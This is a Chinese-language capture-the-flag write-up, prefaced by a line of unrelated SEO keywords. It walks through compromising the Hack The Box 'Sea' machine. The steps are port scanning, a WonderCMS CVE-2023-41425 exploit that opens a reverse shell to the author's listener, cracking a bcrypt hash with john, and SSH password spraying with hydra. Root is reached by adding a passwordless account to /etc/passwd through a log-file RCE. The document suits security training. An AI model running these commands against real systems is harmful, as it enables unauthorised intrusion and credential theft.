购物网站首页模板,网站字头优化,时尚字体设计网站,网站进行诊断目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
使用curl访问靶机80端口
使用ffuf对靶机进行了一顿FUZZ
尝试在Github上搜索版权拥有者
除了LICENSE还FUZZ出了version文件尝试访问
尝试直接在Github搜索该符合该版本的EXP
横向移动
使用john对该哈…目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
使用curl访问靶机80端口
使用ffuf对靶机进行了一顿FUZZ
尝试在Github上搜索版权拥有者
除了LICENSE还FUZZ出了version文件尝试访问
尝试直接在Github搜索该符合该版本的EXP
横向移动
使用john对该哈希值进行爆破
使用hydra对靶机系统进行SSH服务密码喷洒
USER_FLAGfe382298cf2c1d24dff7ffe321071998
特权提升
直接使用amay用户的凭证即可登录
ROOT_FLAGf0029f417785aefce36306dd8ee1951a 连接至HTB服务器并启动靶机 靶机IP10.10.11.28 分配IP10.10.16.7 使用nmap对靶机TCP端口进行开放扫描
nmap -p- -sS --min-rate1500 -T5 -Pn 10.10.11.28 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nmap -p- -sS --min-rate1500 -T5 -Pn 10.10.11.28 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-13 22:19 EST Warning: 10.10.11.28 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.11.28 Host is up (0.15s latency). Not shown: 64119 closed tcp ports (reset), 1414 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 50.14 seconds 使用curl访问靶机80端口
curl -I http://10.10.11.28:80 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://10.10.11.28:80 HTTP/1.0 200 OK Date: Thu, 14 Nov 2024 03:10:54 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSIDtaj3r4rcaf7irnq5gfk3hks2o5; path/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charsetUTF-8 使用ffuf对靶机进行了一顿FUZZ 访问LICENSE文件
curl http://10.10.11.28/themes/bike/LICENSE ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl http://10.10.11.28/themes/bike/LICENSE MIT License Copyright (c) 2019 turboblack Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 尝试在Github上搜索版权拥有者 查看Github上的LICENSE文件可以发现与我们FUZZ到的文件内容是一模一样的 基本可以确定靶机使用的WebAPP为WonderCMS
除了LICENSE还FUZZ出了version文件尝试访问 curl http://10.10.11.28/themes/bike/version ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl http://10.10.11.28/themes/bike/version 3.2.0 尝试直接在Github搜索该符合该版本的EXP 可以看到爆了漏洞编号CVE-2023-41425 我这里使用的EXP链接https://github.com/duck-sec/CVE-2023-41425(如果你找到的EXP不起作用可以试试这个)
git clone https://github.com/duck-sec/CVE-2023-41425.git
配置好参数
python exploit.py -u http://sea.htb/loginURL -lh 10.10.16.7 -lp 1425 -sh 10.10.16.7 -sp 8888 将下面的链接通过/contact页面发送至管理员处不多时便能收到访问请求 本地侧nc提前开启监听此刻也可收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvp 1425 listening on [any] 1425 ... 10.10.11.28: inverse host lookup failed: Unknown host connect to [10.10.16.7] from (UNKNOWN) [10.10.11.28] 38378 Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 11:03:14 up 30 min, 0 users, load average: 0.69, 0.67, 0.38 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid33(www-data) gid33(www-data) groups33(www-data) /bin/sh: 0: cant access tty; job control turned off $ whoami www-data 横向移动
通过命令可知系统内安装有python3 $ python3 -V Python 3.8.10 提升TTY
python3 -c import pty;pty.spawn(/bin/bash)
在一翻搜索后在/var/www/sea/data目录下找到database.js文件 www-datasea:/var/www/sea/data$ pwd pwd /var/www/sea/data www-datasea:/var/www/sea/data$ ls ls cache.json database.js files 使用cat命令查看其内容里面有一串哈希密码
grep -C 5 password database.js $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q
将该哈希值去除反斜杠后存入hash文件中
echo $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q | tr -d \\ hash ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# echo $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q | tr -d \\ hash ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# cat hash $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q 使用john对该哈希值进行爆破
john hash --wordlist../dictionary/rockyou.txt ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# john hash --wordlist../dictionary/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 6 OpenMP threads Press q or Ctrl-C to abort, almost any other key for statusmychemicalromance (?) 1g 0:00:00:29 DONE (2024-11-14 06:32) 0.03343g/s 102.9p/s 102.9c/s 102.9C/s iamcool..milena Use the --show option to display all of the cracked passwords reliably Session completed. 拿到了明文密码mychemicalromance
由于不知道该密码对哪个用户有效所以我们查看一下系统内支持登录的用户
cat /etc/passwd 支持终端交互的用户有root、amay、geo
将三个用户名写入users.txt文件中
echo root\namay\ngeo users.txt ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# echo root\namay\ngeo users.txt ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# cat users.txt root amay geo 使用hydra对靶机系统进行SSH服务密码喷洒
hydra -L users.txt -p mychemicalromance ssh://10.10.11.28 账户amay 密码mychemicalromance 使用该凭证通过SSH服务登录到靶机
ssh amay10.10.11.28 登陆后在当前目录下就能找到user.txt amaysea:~$ ls user.txt amaysea:~$ cat user.txt fe382298cf2c1d24dff7ffe321071998 USER_FLAGfe382298cf2c1d24dff7ffe321071998 特权提升
查看靶机网络连接
ss -tlnp 可见靶机内部是开放了8080端口我尝试通过SSH服务将其转发到本地
ssh -L 8080:localhost:8080 amay10.10.11.28
端口转发后使用浏览器直接访问上来就提示需要认证 直接使用amay用户的凭证即可登录 经过一系列测试发现Analyze Log File此处存在任意文件读取 使用BurpSuite进行抓包重放 接着尝试RCE发现居然也可以 我尝试直接往靶机/etc/passwd文件中加入无密码管理员用户
记得将Payloadd进行URL编码 直接扔到重放器里发包 在靶机中再次查看/etc/passwd文件
cat /etc/passwd 查找root_flag位置并查看其内容 rootsea:/home/amay# find / -name root.txt /root/root.txt rootsea:/home/amay# cat /root/root.txt f0029f417785aefce36306dd8ee1951a ROOT_FLAGf0029f417785aefce36306dd8ee1951a
